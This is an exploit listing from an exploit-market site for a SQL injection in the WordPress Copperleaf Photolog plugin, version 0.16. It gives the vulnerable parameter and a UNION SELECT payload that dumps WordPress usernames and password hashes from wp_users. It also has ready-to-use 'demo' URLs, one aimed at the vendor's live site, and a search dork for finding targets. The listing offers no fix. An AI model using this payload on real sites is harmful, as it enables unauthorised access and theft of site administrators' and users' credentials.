[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Copperleaf Photolog SQL injection

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10906
Category
web applications
Date add
15-02-2010
Platform
unsorted
===========================================
WordPress Copperleaf Photolog SQL injection
===========================================

[ Software Information ]
 
[+] Vendor : http://www.copperleaf.org/
[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip
[+] version : 0.16 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID]
 
[ XpL]
 
+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--
 
[ DEMO ]
 
[+] Demo Vendor
 
http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097
 
[+] Demo plugins
 
http://demo.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
 
[ FIX ]
 
dunno :">



#  0day.today [2024-11-16]  #